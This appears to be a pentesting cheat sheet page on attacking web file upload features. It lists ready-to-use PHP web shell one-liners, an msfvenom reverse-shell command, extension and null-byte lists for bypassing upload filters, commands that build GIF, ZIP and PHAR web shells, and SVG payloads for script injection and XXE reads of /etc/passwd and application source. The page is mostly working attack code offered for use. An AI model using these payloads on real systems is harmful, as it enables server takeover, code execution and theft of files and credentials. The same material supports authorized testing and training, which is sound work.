File Upload Pentesting

PHP Upload Payloads (one liners)

<?php file_get_contents('/etc/passwd'); ?>	
<?php system('hostname'); ?>	
<?php system($_REQUEST['cmd']); ?>
<% eval request('cmd') %>
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php

PHP Code (Much better Output of RCE)

Use this code in a file

<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>

PHP File Extensions For Burp Intruder

.jpeg.php
.jpg.php
.png.php
.php
.php3
.php4
.php5
.php7
.php8
.pht
.phar
.phpt
.pgif
.phtml
.phtm
.php%00.gif
.php\x00.gif
.php%00.png
.php\x00.png
.php%00.jpg
.php\x00.jpg

Content Types For File Upload

image/bmp
image/cgm
image/g3fax
image/gif
image/ief
image/jpeg
image/ktx
image/pjpeg
image/png
image/prs.btif
image/svg+xml
image/tiff
image/vnd.adobe.photoshop
image/vnd.dece.graphic
image/vnd.djvu
image/vnd.dvb.subtitle
image/vnd.dwg
image/vnd.dxf
image/vnd.fastbidsheet
image/vnd.fpx
image/vnd.fst
image/vnd.fujixerox.edmics-mmr
image/vnd.fujixerox.edmics-rlc
image/vnd.ms-modi
image/vnd.net-fpx
image/vnd.wap.wbmp
image/vnd.xiff
image/webp
image/x-citrix-jpeg
image/x-citrix-png
image/x-cmu-raster
image/x-cmx
image/x-freehand
image/x-icon
image/x-pcx
image/x-pict
image/x-png
image/x-portable-anymap
image/x-portable-bitmap
image/x-portable-graymap
image/x-portable-pixmap
image/x-rgb
image/x-xbitmap
image/x-xpixmap
image/x-xwindowdump
application/vnd.3lightssoftware.imagescal
application/vnd.fastcopy-disk-image
application/vnd.imagemeter.folder+zip
application/vnd.imagemeter.image+zip
application/vnd.msa-disk-image
application/vnd.oci.image.manifest.v1+json
image/aces
image/avci
image/avcs
image/dicom-rle
image/emf
image/example
image/fits
image/heic
image/heic-sequence
image/heif
image/heif-sequence
image/hej2k
image/hsj2
image/jls
image/jp2
image/jph
image/jphc
image/jpm
image/jpx
image/jxr
image/jxra
image/jxrs
image/jxs
image/jxsc
image/jxsi
image/jxss
image/ktx2
image/naplps
image/prs.pti
image/pwg-raster
image/t38
image/tiff-fx
image/vnd.airzip.accelerator.azv
image/vnd.cns.inf2
image/vnd.globalgraphics.pgb
image/vnd.microsoft.icon
image/vnd.mix
image/vnd.mozilla.apng
image/vnd.pco.b16
image/vnd.radiance
image/vnd.sealed.png
image/vnd.sealedmedia.softseal.gif
image/vnd.sealedmedia.softseal.jpg
image/vnd.svf
image/vnd.tencent.tap
image/vnd.valve.source.texture
image/vnd.zbrush.pcx
image/wmf

LFI and File Upload to RCE

Crafting Malicious Image

we can create a malicious image and then try to get RCE

echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

ZIP Upload To RCE

We can utilize the zip wrapper to execute PHP code. However, this wrapper isn't enabled by default, so this method may not always work. To do so, we can start by creating a PHP web shell script and zipping it into a zip archive (named shell.jpg), as follows:

echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

PHAR Upload

we can use the phar:// wrapper to achieve a similar result. To do so, we will first write the following PHP script into a shell.php file:

<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

$phar->stopBuffering();

This script can be compiled into a phar file that when called would write a web shell to a shell.txt sub-file, which we can interact with. We can compile it into a phar file and rename it to shell.jpg as follows:

php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

Now, we should have a phar file called shell.jpg. Once we upload it to the web application, we can simply call it with phar:// and provide its URL path, and then specify the phar sub-file with /shell.txt (URL encoded) to get the output of the command we specify with (&cmd=id)

File Uplaod to XSS

SVG File Upload to XSS

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS by Programmerboy");
  </script>
</svg>

SVG Upload to File Read

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>


using php filter

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>

SVG File Upload to RCE

apped Reverse shell php one liner at the end of the svg payload

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]> <svg>&xxe;</svg> <?php system($_REQUEST['cmd']); ?>

Magic Bytes

Sometimes there is a strong filter on the file extension when we are uploading files , we can try to bypass that using magic bytes, which means that i will upload the file extension which is required by the server and then i will add the magic byte in the beginning and rest of the file will be my reverse shell and in that case i will get a reverse shell back.

now i will add the pdf magic byte in the beginning and rest of it will be a reverse shell

now find the file where is is uploading and try to get a reverse shell

PreviousCommand Injection NextLocal and Remote File Inclusion

Last updated 1 year ago

hashtagPHP Upload Payloads (one liners)

hashtagPHP Code (Much better Output of RCE)

hashtagPHP File Extensions For Burp Intruder

hashtagContent Types For File Upload

hashtagLFI and File Upload to RCE

hashtagCrafting Malicious Image

hashtagZIP Upload To RCE

hashtagPHAR Upload

hashtagFile Uplaod to XSS

hashtagSVG File Upload to XSS

hashtagSVG Upload to File Read

hashtagSVG File Upload to RCE

hashtagMagic Bytes